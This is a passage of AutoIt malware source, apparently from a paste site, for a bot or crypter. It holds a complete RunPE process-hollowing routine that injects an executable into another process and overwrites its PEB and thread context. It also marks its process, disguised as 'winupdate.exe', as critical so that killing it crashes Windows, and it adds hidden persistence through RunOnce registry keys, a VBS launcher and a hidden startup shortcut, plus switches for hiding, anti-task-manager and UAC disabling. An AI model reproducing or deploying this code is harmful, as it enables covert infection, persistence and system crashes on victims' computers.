- $pzeropoint = __runpe_allocateexespace($hprocess, $ioptionalheadersizeofimagenew)
- If @error Then
- $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
- If @error Then
- __runpe_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
- $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
- If @error Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(101, 1, 0)
- EndIf
- EndIf
- EndIf
- $frelocate = True
- Else
- $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
- If @error Then
- __runpe_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
- $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
- If @error Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(101, 0, 0)
- EndIf
- EndIf
- EndIf
- DllStructSetData($timage_optional_header, "IMAGEBASE", $pzeropoint)
- #region 7. CONSTRUCT THE NEW MODULE
- Local $tmodule = DllStructCreate("BYTE[" & $ioptionalheadersizeofimagenew & "]")
- Local $pmodule = DllStructGetPtr($tmodule)
- Local $theaders = DllStructCreate("BYTE[" & $ioptionalheadersizeofheadersnew & "]", $pheaders_new)
- DllStructSetData($tmodule, 1, DllStructGetData($theaders, 1))
- Local $timage_section_header
- Local $isizeofrawdata, $ppointertorawdata
- Local $ivirtualaddress, $ivirtualsize
- Local $trelocraw
- For $i = 1 To $inumberofsections
- $timage_section_header = DllStructCreate("CHAR NAME[8];" & "DWORD UNIONOFVIRTUALSIZEANDPHYSICALADDRESS;" & "DWORD VIRTUALADDRESS;" & "DWORD SIZEOFRAWDATA;" & "DWORD POINTERTORAWDATA;" & "DWORD POINTERTORELOCATIONS;" & "DWORD POINTERTOLINENUMBERS;" & "WORD NUMBEROFRELOCATIONS;" & "WORD NUMBEROFLINENUMBERS;" & "DWORD CHARACTERISTICS", $ppointer)
- $isizeofrawdata = DllStructGetData($timage_section_header, "SIZEOFRAWDATA")
- $ppointertorawdata = $pheaders_new + DllStructGetData($timage_section_header, "POINTERTORAWDATA")
- $ivirtualaddress = DllStructGetData($timage_section_header, "VIRTUALADDRESS")
- $ivirtualsize = DllStructGetData($timage_section_header, "UNIONOFVIRTUALSIZEANDPHYSICALADDRESS")
- If $ivirtualsize And $ivirtualsize < $isizeofrawdata Then $isizeofrawdata = $ivirtualsize
- If $isizeofrawdata Then
- DllStructSetData(DllStructCreate("BYTE[" & $isizeofrawdata & "]", $pmodule + $ivirtualaddress), 1, DllStructGetData(DllStructCreate("BYTE[" & $isizeofrawdata & "]", $ppointertorawdata), 1))
- EndIf
- If $frelocate Then
- If $ivirtualaddress <= $paddressnewbasereloc And $ivirtualaddress + $isizeofrawdata > $paddressnewbasereloc Then
- $trelocraw = DllStructCreate("BYTE[" & $isizebasereloc & "]", $ppointertorawdata + ($paddressnewbasereloc - $ivirtualaddress))
- EndIf
- EndIf
- $ppointer += 40
- Next
- If $frelocate Then __runpe_fixreloc($pmodule, $trelocraw, $pzeropoint, $poptionalheaderimagebasenew, $imagic = 523)
- $acall = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hprocess, "PTR", $pzeropoint, "PTR", $pmodule, "DWORD_PTR", $ioptionalheadersizeofimagenew, "DWORD_PTR*", 0)
- If @error Or Not $acall[0] Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(7, 0, 0)
- EndIf
- #region 8. PEB IMAGEBASEADDRESS MANIPULATION
- Local $tpeb = DllStructCreate("BYTE INHERITEDADDRESSSPACE;" & "BYTE READIMAGEFILEEXECOPTIONS;" & "BYTE BEINGDEBUGGED;" & "BYTE SPARE;" & "PTR MUTANT;" & "PTR IMAGEBASEADDRESS;" & "PTR LOADERDATA;" & "PTR PROCESSPARAMETERS;" & "PTR SUBSYSTEMDATA;" & "PTR PROCESSHEAP;" & "PTR FASTPEBLOCK;" & "PTR FASTPEBLOCKROUTINE;" & "PTR FASTPEBUNLOCKROUTINE;" & "DWORD ENVIRONMENTUPDATECOUNT;" & "PTR KERNELCALLBACKTABLE;" & "PTR EVENTLOGSECTION;" & "PTR EVENTLOG;" & "PTR FREELIST;" & "DWORD TLSEXPANSIONCOUNTER;" & "PTR TLSBITMAP;" & "DWORD TLSBITMAPBITS[2];" & "PTR READONLYSHAREDMEMORYBASE;" & "PTR READONLYSHAREDMEMORYHEAP;" & "PTR READONLYSTATICSERVERDATA;" & "PTR ANSICODEPAGEDATA;" & "PTR OEMCODEPAGEDATA;" & "PTR UNICODECASETABLEDATA;" & "DWORD NUMBEROFPROCESSORS;" & "DWORD NTGLOBALFLAG;" & "BYTE SPARE2[4];" & "INT64 CRITICALSECTIONTIMEOUT;" & "DWORD HEAPSEGMENTRESERVE;" & "DWORD HEAPSEGMENTCOMMIT;" & "DWORD HEAPDECOMMITTOTALFREETHRESHOLD;" & "DWORD HEAPDECOMMITFREEBLOCKTHRESHOLD;" & "DWORD NUMBEROFHEAPS;" & "DWORD MAXIMUMNUMBEROFHEAPS;" & "PTR PROCESSHEAPS;" & "PTR GDISHAREDHANDLETABLE;" & "PTR PROCESSSTARTERHELPER;" & "PTR GDIDCATTRIBUTELIST;" & "PTR LOADERLOCK;" & "DWORD OSMAJORVERSION;" & "DWORD OSMINORVERSION;" & "DWORD OSBUILDNUMBER;" & "DWORD OSPLATFORMID;" & "DWORD IMAGESUBSYSTEM;" & "DWORD IMAGESUBSYSTEMMAJORVERSION;" & "DWORD IMAGESUBSYSTEMMINORVERSION;" & "DWORD GDIHANDLEBUFFER[34];" & "DWORD POSTPROCESSINITROUTINE;" & "DWORD TLSEXPANSIONBITMAP;" & "BYTE TLSEXPANSIONBITMAPBITS[128];" & "DWORD SESSIONID")
- $acall = DllCall("KERNEL32.DLL", "BOOL", "ReadProcessMemory", "PTR", $hprocess, "PTR", $ppeb, "PTR", DllStructGetPtr($tpeb), "DWORD_PTR", DllStructGetSize($tpeb), "DWORD_PTR*", 0)
- If @error Or Not $acall[0] Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(8, 0, 0)
- EndIf
- DllStructSetData($tpeb, "IMAGEBASEADDRESS", $pzeropoint)
- $acall = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hprocess, "PTR", $ppeb, "PTR", DllStructGetPtr($tpeb), "DWORD_PTR", DllStructGetSize($tpeb), "DWORD_PTR*", 0)
- If @error Or Not $acall[0] Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(9, 0, 0)
- EndIf
- #region 9. NEW ENTRY POINT
- Switch $irunflag
- Case 1
- DllStructSetData($tcontext, "EAX", $pzeropoint + $ientrypointnew)
- Case 2
- DllStructSetData($tcontext, "RCX", $pzeropoint + $ientrypointnew)
- Case 3
- EndSwitch
- #region 10. SET NEW CONTEXT
- $acall = DllCall("KERNEL32.DLL", "BOOL", "SetThreadContext", "HANDLE", $hthread, "PTR", DllStructGetPtr($tcontext))
- If @error Or Not $acall[0] Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(10, 0, 0)
- EndIf
- #region 11. RESUME THREAD
- $acall = DllCall("KERNEL32.DLL", "DWORD", "ResumeThread", "HANDLE", $hthread)
- If @error Or $acall[0] = -1 Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(11, 0, 0)
- EndIf
- #region 12. CLOSE OPEN HANDLES AND RETURN PID
- DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hprocess)
- DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hthread)
- Return DllStructGetData($tprocess_information, "PROCESSID")
- EndFunc ;==>_RunPE
- Func __runpe_fixreloc($pmodule, $tdata, $paddressnew, $paddressold, $fimagex64)
- Local $idelta = $paddressnew - $paddressold
- Local $isize = DllStructGetSize($tdata)
- Local $pdata = DllStructGetPtr($tdata)
- Local $timage_base_relocation, $irelativemove
- Local $ivirtualaddress, $isizeofblock, $inumberofentries
- Local $tenries, $idata, $taddress
- Local $iflag = 3 + 7 * $fimagex64
- While $irelativemove < $isize
- $timage_base_relocation = DllStructCreate("DWORD VIRTUALADDRESS; DWORD SIZEOFBLOCK", $pdata + $irelativemove)
- $ivirtualaddress = DllStructGetData($timage_base_relocation, "VIRTUALADDRESS")
- $isizeofblock = DllStructGetData($timage_base_relocation, "SIZEOFBLOCK")
- $inumberofentries = ($isizeofblock - 8) / 2
- $tenries = DllStructCreate("WORD[" & $inumberofentries & "]", DllStructGetPtr($timage_base_relocation) + 8)
- For $i = 1 To $inumberofentries
- $idata = DllStructGetData($tenries, 1, $i)
- If BitShift($idata, 12) = $iflag Then
- $taddress = DllStructCreate("PTR", $pmodule + $ivirtualaddress + BitAND($idata, 4095))
- DllStructSetData($taddress, 1, DllStructGetData($taddress, 1) + $idelta)
- EndIf
- Next
- $irelativemove += $isizeofblock
- WEnd
- Return 1
- EndFunc ;==>__runpe_fixreloc
- Func __runpe_allocateexespaceataddress($hprocess, $paddress, $isize)
- Local $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", $paddress, "DWORD_PTR", $isize, "DWORD", 4096, "DWORD", 64)
- If @error Or Not $acall[0] Then
- $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", $paddress, "DWORD_PTR", $isize, "DWORD", 12288, "DWORD", 64)
- If @error Or Not $acall[0] Then Return SetError(1, 0, 0)
- EndIf
- Return $acall[0]
- EndFunc ;==>__runpe_allocateexespaceataddress
- Func __runpe_allocateexespace($hprocess, $isize)
- Local $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", 0, "DWORD_PTR", $isize, "DWORD", 12288, "DWORD", 64)
- If @error Or Not $acall[0] Then Return SetError(1, 0, 0)
- Return $acall[0]
- EndFunc ;==>__runpe_allocateexespace
- Func __runpe_unmapviewofsection($hprocess, $paddress)
- DllCall("NTDLL.DLL", "INT", "NtUnmapViewOfSection", "PTR", $hprocess, "PTR", $paddress)
- If @error Then Return SetError(1, 0, 0)
- Return 1
- EndFunc ;==>__runpe_unmapviewofsection
- Func __runpe_iswow64process($hprocess)
- Local $acall = DllCall("KERNEL32.DLL", "BOOL", "IsWow64Process", "HANDLE", $hprocess, "BOOL*", 0)
- If @error Or Not $acall[0] Then Return SetError(1, 0, 0)
- Return $acall[2]
- EndFunc ;==>__runpe_iswow64process
- ;END OF RUNPE----------------------------------
- ;PROTECT PROCESS
- Global Const $tagrect = "struct;long Left;long Top;long Right;long Bottom;endstruct"
- Global Const $tagtoken_privileges = "dword Count;align 4;int64 LUID;dword Attributes"
- Global Const $error_no_token = 1008
- Global Const $se_privilege_enabled_by_default = 1
- Global Const $se_privilege_enabled = 2
- Global Const $se_privilege_removed = 4
- Global Enum $tokenprimary = 1, $tokenimpersonation
- Global Enum $securityanonymous = 0, $securityidentification, $securityimpersonation, $securitydelegation
- Global Const $token_assign_primary = 1
- Global Const $token_duplicate = 2
- Global Const $token_impersonate = 4
- Global Const $token_query = 8
- Global Const $token_query_source = 16
- Global Const $token_adjust_privileges = 32
- Func _winapi_getlasterror($curerr = @error, $curext = @extended)
- Local $aresult = DllCall("kernel32.dll", "dword", "GetLastError")
- Return SetError($curerr, $curext, $aresult[0])
- EndFunc
- Func _security__adjusttokenprivileges($htoken, $fdisableall, $pnewstate, $ibufferlen, $pprevstate = 0, $prequired = 0)
- Local $acall = DllCall("advapi32.dll", "bool", "AdjustTokenPrivileges", "handle", $htoken, "bool", $fdisableall, "struct*", $pnewstate, "dword", $ibufferlen, "struct*", $pprevstate, "struct*", $prequired)
- If @error Then Return SetError(1, @extended, False)
- Return NOT ($acall[0] = 0)
- EndFunc
- Func _security__getlengthsid($psid)
- If NOT _security__isvalidsid($psid) Then Return SetError(1, @extended, 0)
- Local $acall = DllCall("advapi32.dll", "dword", "GetLengthSid", "struct*", $psid)
- If @error Then Return SetError(2, @extended, 0)
- Return $acall[0]
- EndFunc
- Func _security__impersonateself($ilevel = $securityimpersonation)
- Local $acall = DllCall("advapi32.dll", "bool", "ImpersonateSelf", "int", $ilevel)
- If @error Then Return SetError(1, @extended, False)
- Return NOT ($acall[0] = 0)
- EndFunc
- Func _security__isvalidsid($psid)
- Local $acall = DllCall("advapi32.dll", "bool", "IsValidSid", "struct*", $psid)
- If @error Then Return SetError(1, @extended, False)
- Return NOT ($acall[0] = 0)
- EndFunc
- Func _security__lookupaccountname($saccount, $ssystem = "")
- Local $tdata = DllStructCreate("byte SID[256]")
- Local $acall = DllCall("advapi32.dll", "bool", "LookupAccountNameW", "wstr", $ssystem, "wstr", $saccount, "struct*", $tdata, "dword*", DllStructGetSize($tdata), "wstr", "", "dword*", DllStructGetSize($tdata), "int*", 0)
- If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
- Local $aacct[3]
- $aacct[0] = _security__sidtostringsid(DllStructGetPtr($tdata, "SID"))
- $aacct[1] = $acall[5]
- $aacct[2] = $acall[7]
- Return $aacct
- EndFunc
- Func _security__lookupprivilegevalue($ssystem, $sname)
- Local $acall = DllCall("advapi32.dll", "bool", "LookupPrivilegeValueW", "wstr", $ssystem, "wstr", $sname, "int64*", 0)
- If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
- Return $acall[3]
- EndFunc
- Func _security__openthreadtoken($iaccess, $hthread = 0, $fopenasself = False)
- If $hthread = 0 Then $hthread = _winapi_getcurrentthread()
- If @error Then Return SetError(1, @extended, 0)
- Local $acall = DllCall("advapi32.dll", "bool", "OpenThreadToken", "handle", $hthread, "dword", $iaccess, "bool", $fopenasself, "handle*", 0)
- If @error OR NOT $acall[0] Then Return SetError(2, @extended, 0)
- Return $acall[4]
- EndFunc
- Func _security__openthreadtokenex($iaccess, $hthread = 0, $fopenasself = False)
- Local $htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself)
- If $htoken = 0 Then
- If _winapi_getlasterror() <> $error_no_token Then Return SetError(3, _winapi_getlasterror(), 0)
- If NOT _security__impersonateself() Then Return SetError(1, _winapi_getlasterror(), 0)
- $htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself)
- If $htoken = 0 Then Return SetError(2, _winapi_getlasterror(), 0)
- EndIf
- Return $htoken
- EndFunc
- Func _security__setprivilege($htoken, $sprivilege, $fenable)
- Local $iluid = _security__lookupprivilegevalue("", $sprivilege)
- If $iluid = 0 Then Return SetError(1, @extended, False)
- Local $tcurrstate = DllStructCreate($tagtoken_privileges)
- Local $icurrstate = DllStructGetSize($tcurrstate)
- Local $tprevstate = DllStructCreate($tagtoken_privileges)
- Local $iprevstate = DllStructGetSize($tprevstate)
- Local $trequired = DllStructCreate("int Data")
- DllStructSetData($tcurrstate, "Count", 1)
- DllStructSetData($tcurrstate, "LUID", $iluid)
- If NOT _security__adjusttokenprivileges($htoken, False, $tcurrstate, $icurrstate, $tprevstate, $trequired) Then Return SetError(2, @error, False)
- DllStructSetData($tprevstate, "Count", 1)
- DllStructSetData($tprevstate, "LUID", $iluid)
- Local $iattributes = DllStructGetData($tprevstate, "Attributes")
- If $fenable Then
- $iattributes = BitOR($iattributes, $se_privilege_enabled)
- Else
- $iattributes = BitAND($iattributes, BitNOT($se_privilege_enabled))
- EndIf
- DllStructSetData($tprevstate, "Attributes", $iattributes)
- If NOT _security__adjusttokenprivileges($htoken, False, $tprevstate, $iprevstate, $tcurrstate, $trequired) Then Return SetError(3, @error, False)
- Return True
- EndFunc
- Func _security__sidtostringsid($psid)
- If NOT _security__isvalidsid($psid) Then Return SetError(1, 0, "")
- Local $acall = DllCall("advapi32.dll", "bool", "ConvertSidToStringSidW", "struct*", $psid, "ptr*", 0)
- If @error OR NOT $acall[0] Then Return SetError(2, @extended, "")
- Local $pstringsid = $acall[2]
- Local $ssid = DllStructGetData(DllStructCreate("wchar Text[" & _winapi_stringlenw($pstringsid) + 1 & "]", $pstringsid), "Text")
- _winapi_localfree($pstringsid)
- Return $ssid
- EndFunc
- Func _security__stringsidtosid($ssid)
- Local $acall = DllCall("advapi32.dll", "bool", "ConvertStringSidToSidW", "wstr", $ssid, "ptr*", 0)
- If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
- Local $psid = $acall[2]
- Local $tbuffer = DllStructCreate("byte Data[" & _security__getlengthsid($psid) & "]", $psid)
- Local $tsid = DllStructCreate("byte Data[" & DllStructGetSize($tbuffer) & "]")
- DllStructSetData($tsid, "Data", DllStructGetData($tbuffer, "Data"))
- _winapi_localfree($psid)
- Return $tsid
- EndFunc
- Func _winapi_closehandle($hobject)
- Local $aresult = DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hobject)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- Func _winapi_createsolidbrush($ncolor)
- Local $aresult = DllCall("gdi32.dll", "handle", "CreateSolidBrush", "dword", $ncolor)
- If @error Then Return SetError(@error, @extended, 0)
- Return $aresult[0]
- EndFunc
- Func _winapi_deletedc($hdc)
- Local $aresult = DllCall("gdi32.dll", "bool", "DeleteDC", "handle", $hdc)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- Func _winapi_deleteobject($hobject)
- Local $aresult = DllCall("gdi32.dll", "bool", "DeleteObject", "handle", $hobject)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- Func _winapi_fillrect($hdc, $ptrrect, $hbrush)
- Local $aresult
- If IsPtr($hbrush) Then
- $aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "handle", $hbrush)
- Else
- $aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "dword_ptr", $hbrush)
- EndIf
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- Func _winapi_getclassname($hwnd)
- If NOT IsHWnd($hwnd) Then $hwnd = GUICtrlGetHandle($hwnd)
- Local $aresult = DllCall("user32.dll", "int", "GetClassNameW", "hwnd", $hwnd, "wstr", "", "int", 4096)
- If @error Then Return SetError(@error, @extended, False)
- Return SetExtended($aresult[0], $aresult[2])
- EndFunc
- Func _winapi_getclientrect($hwnd)
- Local $trect = DllStructCreate($tagrect)
- DllCall("user32.dll", "bool", "GetClientRect", "hwnd", $hwnd, "struct*", $trect)
- If @error Then Return SetError(@error, @extended, 0)
- Return $trect
- EndFunc
- Func _winapi_getcurrentthread()
- Local $aresult = DllCall("kernel32.dll", "handle", "GetCurrentThread")
- If @error Then Return SetError(@error, @extended, 0)
- Return $aresult[0]
- EndFunc
- Func _winapi_getdc($hwnd)
- Local $aresult = DllCall("user32.dll", "handle", "GetDC", "hwnd", $hwnd)
- If @error Then Return SetError(@error, @extended, 0)
- Return $aresult[0]
- EndFunc
- Func _winapi_getdesktopwindow()
- Local $aresult = DllCall("user32.dll", "hwnd", "GetDesktopWindow")
- If @error Then Return SetError(@error, @extended, 0)
- Return $aresult[0]
- EndFunc
- Func _winapi_getmodulehandle($smodulename)
- Local $smodulenametype = "wstr"
- If $smodulename = "" Then
- $smodulename = 0
- $smodulenametype = "ptr"
- EndIf
- Local $aresult = DllCall("kernel32.dll", "handle", "GetModuleHandleW", $smodulenametype, $smodulename)
- If @error Then Return SetError(@error, @extended, 0)
- Return $aresult[0]
- EndFunc
- Func _winapi_getwindow($hwnd, $icmd)
- Local $aresult = DllCall("user32.dll", "hwnd", "GetWindow", "hwnd", $hwnd, "uint", $icmd)
- If @error Then Return SetError(@error, @extended, 0)
- Return $aresult[0]
- EndFunc
- Func _winapi_iswindowvisible($hwnd)
- Local $aresult = DllCall("user32.dll", "bool", "IsWindowVisible", "hwnd", $hwnd)
- If @error Then Return SetError(@error, @extended, 0)
- Return $aresult[0]
- EndFunc
- Func _winapi_lineto($hdc, $ix, $iy)
- Local $aresult = DllCall("gdi32.dll", "bool", "LineTo", "handle", $hdc, "int", $ix, "int", $iy)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- Func _winapi_localfree($hmem)
- Local $aresult = DllCall("kernel32.dll", "handle", "LocalFree", "handle", $hmem)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- Func _winapi_moveto($hdc, $ix, $iy)
- Local $aresult = DllCall("gdi32.dll", "bool", "MoveToEx", "handle", $hdc, "int", $ix, "int", $iy, "ptr", 0)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- Func _winapi_openprocess($iaccess, $finherit, $iprocessid, $fdebugpriv = False)
- Local $aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid)
- If @error Then Return SetError(@error, @extended, 0)
- If $aresult[0] Then Return $aresult[0]
- If NOT $fdebugpriv Then Return 0
- Local $htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query))
- If @error Then Return SetError(@error, @extended, 0)
- _security__setprivilege($htoken, "SeDebugPrivilege", True)
- Local $ierror = @error
- Local $ilasterror = @extended
- Local $iret = 0
- If NOT @error Then
- $aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid)
- $ierror = @error
- $ilasterror = @extended
- If $aresult[0] Then $iret = $aresult[0]
- _security__setprivilege($htoken, "SeDebugPrivilege", False)
- If @error Then
- $ierror = @error
- $ilasterror = @extended
- EndIf
- EndIf
- _winapi_closehandle($htoken)
- Return SetError($ierror, $ilasterror, $iret)
- EndFunc
- Func __winapi_parsefiledialogpath($spath)
- Local $afiles[3]
- $afiles[0] = 2
- Local $stemp = StringMid($spath, 1, StringInStr($spath, "\\", 0, -1) - 1)
- $afiles[1] = $stemp
- $afiles[2] = StringMid($spath, StringInStr($spath, "\\", 0, -1) + 1)
- Return $afiles
- EndFunc
- Func _winapi_releasedc($hwnd, $hdc)
- Local $aresult = DllCall("user32.dll", "int", "ReleaseDC", "hwnd", $hwnd, "handle", $hdc)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- Func _winapi_screentoclient($hwnd, ByRef $tpoint)
- Local $aresult = DllCall("user32.dll", "bool", "ScreenToClient", "hwnd", $hwnd, "struct*", $tpoint)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- Func _winapi_selectobject($hdc, $hgdiobj)
- Local $aresult = DllCall("gdi32.dll", "handle", "SelectObject", "handle", $hdc, "handle", $hgdiobj)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- Func _winapi_stringlenw($vstring)
- Local $acall = DllCall("kernel32.dll", "int", "lstrlenW", "struct*", $vstring)
- If @error Then Return SetError(1, @extended, 0)
- Return $acall[0]
- EndFunc
- ;-------------------------------------------------------------------------------------------------------------------------------------------------
- $scriptname = "winupdate.exe"
- Func anti_hook()
- __bsod($scriptname, True)
- EndFunc
- $protectprocess = IniRead($uniscriptdir & "\65901.PPZ", "2244034", "6224525", "NotFound")
- If $protectprocess = "3244993" Then
- AdlibRegister("anti_hook", 500)
- Else
- EndIf
- Func __bsod($process_name, $bsod_status)
- Local Const $status_success = 0
- Local Const $bsod_class = 29
- Local Const $info_length = 4
- Local Const $process_all_access = 2035711
- Local $result, $process_handle, $process_id, $bsod_struct, $bsod_struct_ptr
- If NOT Call("__DEBUGE_PRIVILEGE", True) Then Return "![>] ERROR : DEBUGE PRIVILEGE OF PROCESS [ " & $process_name & " ] CAN NOT CHANGED"
- $process_id = ProcessExists($process_name)
- If $process_id = 0 Then Return "![>] ERROR : PROCESS [ " & $process_name & " ] NOT EXIST"
- $process_handle = _winapi_openprocess($process_all_access, True, $process_id)
- If @error Then Return "![>] ERROR : CAN NOT OPEN [ " & $process_name & " ] PROCESS"
- $bsod_struct = DllStructCreate("BOOL BSOD_STATUS")
- DllStructSetData($bsod_struct, "BSOD_STATUS", $bsod_status)
- $bsod_struct_ptr = DllStructGetPtr($bsod_struct)
- $result = DllCall("NTDLL.DLL", "DWORD", "NtSetInformationProcess", "HANDLE", $process_handle, "INT", $bsod_class, "PTR", $bsod_struct_ptr, "ULONG", $info_length)
- _winapi_closehandle($process_handle)
- $bsod_struct_ptr = 0
- If $result[0] = $status_success Then
- Return "+[>] BSOD OF PROCESS [ " & $process_name & " ] CHANGED WITH NO ERROR" & @CRLF
- Else
- Return "![>] ERROR : BSOD OF PROCESS [ " & $process_name & " ] NOT CHANGED , ERROR CODE : " & Hex($result[0], 8)
- EndIf
- EndFunc
- Func __debuge_privilege($status)
- Local $htoken, $ilasterror
- $htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query))
- If @error Then Return SetError(@error, @extended, 0)
- $ilasterror = _security__setprivilege($htoken, "SEDEBUGPRIVILEGE", $status)
- _winapi_closehandle($htoken)
- Return $ilasterror
- EndFunc
- OnAutoItExitRegister("exitme")
- Func exitme()
- __bsod($scriptname, False)
- EndFunc
- ;anti botkiller
- Local $antibotkill = IniRead($uniscriptdir & "\65901.PPZ", "antibotkill-1", "antibotkill-2", "NotFound")
- If $antibotkill = "antibotkill-3" Then
- AdlibRegister("antibotkill", 1000)
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- Func antibotkill()
- $getstart = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path)
- if $getstart = $unicode_userprofile & "\\" & $path & "\start.vbs" Then
- ;do nothing
- Else
- RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\\" & $path & "\start.vbs")
- EndIf
- if FileExists($unicode_userprofile & "\\" & $path & "\start.vbs") Then
- ;do nothing
- Else
- Local $vbs = FileOpen($unicode_userprofile & "\\" & $path & "\start.vbs", 1)
- FileWrite($vbs, 'const Hidden = 0' & @CRLF & 'const WaitOnReturn = true' & @CRLF & 'File ="""' & $unicode_userprofile & "\\" & $path & "\\" & 'start.cmd"""' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & 'WshShell.Run file, Hidden, WaitOnReturn' & @CRLF & 'wscript.quit')
- FileClose($vbs)
- EndIf
- if FileExists($unicode_startup & "\start.lnk") Then
- ;do nothing
- Else
- FileCreateShortcut($unicode_userprofile & "\\" & $path & "\start.vbs", $unicode_startup & "\start.lnk")
- FileSetAttrib($unicode_startup & "\start.lnk","+SH")
- EndIf
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;persistence
- Local $persistence = IniRead($uniscriptdir & "\65901.PPZ", "3206254", "5598349", "NotFound")
- If $persistence = "4588436" Then
- AdlibRegister("persistence", 500)
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;system hide
- Local $systemhide = IniRead($uniscriptdir & "\65901.PPZ", "systemhide1", "systemhide2", "NotFound")
- If $systemhide = "systemhide3" Then
- AdlibRegister("systemhide",500)
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;antitask
- Local $antitask = IniRead($uniscriptdir & "\65901.PPZ", "antitask1", "antitask2", "NotFound")
- If $antitask = "antitask3" Then
- AdlibRegister("antitask",500)
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;disable uac
- Local $uac = IniRead($uniscriptdir & "\65901.PPZ", "6404000", "6662859", "NotFound")
- If $uac = "9455413" Then
- AdlibRegister("disable_uac",500)
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- If $uac = "9455413" Then
- loop()
- EndIf
- If $systemhide = "systemhide3" Then
- loop()
- EndIf
- If $antitask = "antitask" Then
- loop()
- EndIf
- If $antibotkill = "antibotkill-3" Then
- loop()
- EndIf
- If $mutex = "mutex3" Then
- loop()
- EndIf
- If $protectprocess = "3244993" Then
- loop()
- EndIf
- If $persistence = "4588436" Then
- loop()
- EndIf
- func loop()
- while 1
- If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then
- __bsod($scriptname, False)
- EndIf
- If WinExists($path) Then
- bsod()
- Else
- EndIf
- sleep(100)
- WEnd
- EndFunc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement